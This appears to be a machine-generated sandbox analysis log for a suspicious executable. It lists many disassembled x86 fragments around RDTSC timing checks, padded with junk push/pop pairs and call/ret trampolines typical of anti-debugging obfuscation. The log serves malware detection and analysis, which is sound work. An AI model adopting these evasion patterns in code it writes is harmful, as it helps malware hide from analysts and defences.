Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A006E0 second address: A0072D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FE1010EA78Ch 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007FE1010EA793h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE1010EA798h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FEDBE second address: 9FEDDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE100E17079h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FEDDC second address: 9FEDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FE1010EA78Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A00829 second address: A0087D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FE100E17070h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007FE100E17066h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c pushad 0x0000001d jo 00007FE100E17066h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 pop ebx 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a jno 00007FE100E1706Ch 0x00000030 jmp 00007FE100E17074h 0x00000035 popad 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0087D second address: A00884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A05A3A second address: A05A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A05A3F second address: A05AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FE1010EA788h 0x00000010 jnl 00007FE1010EA7A3h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE1010EA799h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A05C1A second address: A05C58 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE100E17066h 0x00000008 jmp 00007FE100E1706Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FE100E17072h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE100E1706Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A05C58 second address: A05C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A05C74 second address: A05C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A05C7C second address: A05C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A09705 second address: A0970B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0970B second address: A09710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A09710 second address: A09716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A09771 second address: A0977B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0977B second address: A097CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FE100E17071h 0x00000008 jmp 00007FE100E1706Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 5C9E72EEh 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE100E17068h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xor dword ptr [ebp+12B631E1h], esi 0x00000036 mov edi, dword ptr [ebp+129E3C1Dh] 0x0000003c push F07105D3h 0x00000041 push edx 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A09A05 second address: A09A0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A09A0F second address: A09A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A09B78 second address: A09B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0A25F second address: A0A263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0A430 second address: A0A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FE1010EA786h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0A698 second address: A0A69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0B5FE second address: A0B604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0B604 second address: A0B608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0E2E0 second address: A0E2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0E2E4 second address: A0E2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FE100E1706Eh 0x00000011 jc 00007FE100E17066h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9BE78D second address: 9BE791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9BE791 second address: 9BE797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9BE797 second address: 9BE7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE1010EA78Eh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9BE7AE second address: 9BE7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0E983 second address: A0E987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A0E987 second address: A0E997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A10AF5 second address: A10B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnc 00007FE1010EA786h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A10B1F second address: A10B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jl 00007FE100E17066h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FE100E17068h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov si, cx 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A113E3 second address: A113E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A14079 second address: A1407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A1407F second address: A14083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A14083 second address: A14105 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE100E17066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FE100E17068h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d sub dword ptr [ebp+12B73761h], ebx 0x00000033 mov eax, edi 0x00000035 popad 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007FE100E17068h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+12B6C6A9h] 0x00000058 xchg eax, esi 0x00000059 jmp 00007FE100E17078h 0x0000005e push eax 0x0000005f je 00007FE100E17070h 0x00000065 push eax 0x00000066 push edx 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: A17256 second address: A1725B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1725B second address: A172BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE100E17068h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FE100E17068h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+129E182Eh] 0x0000002f push 00000000h 0x00000031 mov di, 9200h 0x00000035 jo 00007FE100E1706Ch 0x0000003b or dword ptr [ebp+129E377Dh], esi 0x00000041 push 00000000h 0x00000043 mov edi, dword ptr [ebp+129E3961h] 0x00000049 mov bx, dx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jg 00007FE100E17066h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A172BB second address: A172D0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FE1010EA786h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A172D0 second address: A172D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1751B second address: A1751F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A19286 second address: A19297 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FE100E17066h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A183BD second address: A183C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2E0 second address: A1A2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE100E17066h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2EB second address: A1A2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2F1 second address: A1A2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2F5 second address: A1A2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A2F9 second address: A1A31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007FE100E17078h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A194F7 second address: A194FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A468 second address: A1A46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A46E second address: A1A4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, ebx 0x00000008 push dword ptr fs:[00000000h] 0x0000000f clc 0x00000010 push edx 0x00000011 jl 00007FE1010EA789h 0x00000017 mov di, cx 0x0000001a pop edi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov bh, cl 0x00000024 mov eax, dword ptr [ebp+129E110Dh] 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FE1010EA788h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 push FFFFFFFFh 0x00000046 mov dword ptr [ebp+129E1800h], ebx 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 jmp 00007FE1010EA78Dh 0x00000055 pop eax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1C333 second address: A1C338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B549 second address: A1B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA78Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B55B second address: A1B5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a adc edi, 5AE201E2h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FE100E17068h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 call 00007FE100E17076h 0x00000036 stc 0x00000037 pop edi 0x00000038 jbe 00007FE100E17069h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov edi, eax 0x00000047 mov eax, dword ptr [ebp+129E12E1h] 0x0000004d jp 00007FE100E1706Ch 0x00000053 mov edi, dword ptr [ebp+129E2FC0h] 0x00000059 push FFFFFFFFh 0x0000005b call 00007FE100E17072h 0x00000060 pop edi 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jnc 00007FE100E17066h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B5FD second address: A1B603 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A4D1 second address: A1A4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17072h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1B603 second address: A1B62A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1010EA797h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007FE1010EA790h 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1A4ED second address: A1A4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1D43A second address: A1D440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E3C1 second address: A1E3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E3DB second address: A1E3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A213C0 second address: A213D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 jnp 00007FE100E17074h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D1073 second address: 9D107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D107B second address: 9D1080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A21A48 second address: A21A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1D554 second address: A1D55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE100E17066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E54E second address: A1E552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E552 second address: A1E5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE100E17068h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 call 00007FE100E1706Ah 0x00000015 pop edi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007FE100E17076h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov eax, dword ptr [ebp+129E0A11h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FE100E17068h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push esi 0x0000004a pop ebx 0x0000004b jno 00007FE100E17068h 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007FE100E17068h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000016h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov ebx, dword ptr [ebp+129E38E9h] 0x00000073 mov edi, dword ptr [ebp+129E39C5h] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c jnc 00007FE100E17068h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A1E5F8 second address: A1E5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22AC4 second address: A22B47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FE100E17068h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 mov bx, 7385h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FE100E17068h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+12B64069h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FE100E17068h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 jmp 00007FE100E1706Eh 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pop edi 0x00000061 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22B47 second address: A22B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22B4D second address: A22B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FE100E17076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A22B72 second address: A22B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FE1010EA786h 0x0000000d rdtsc
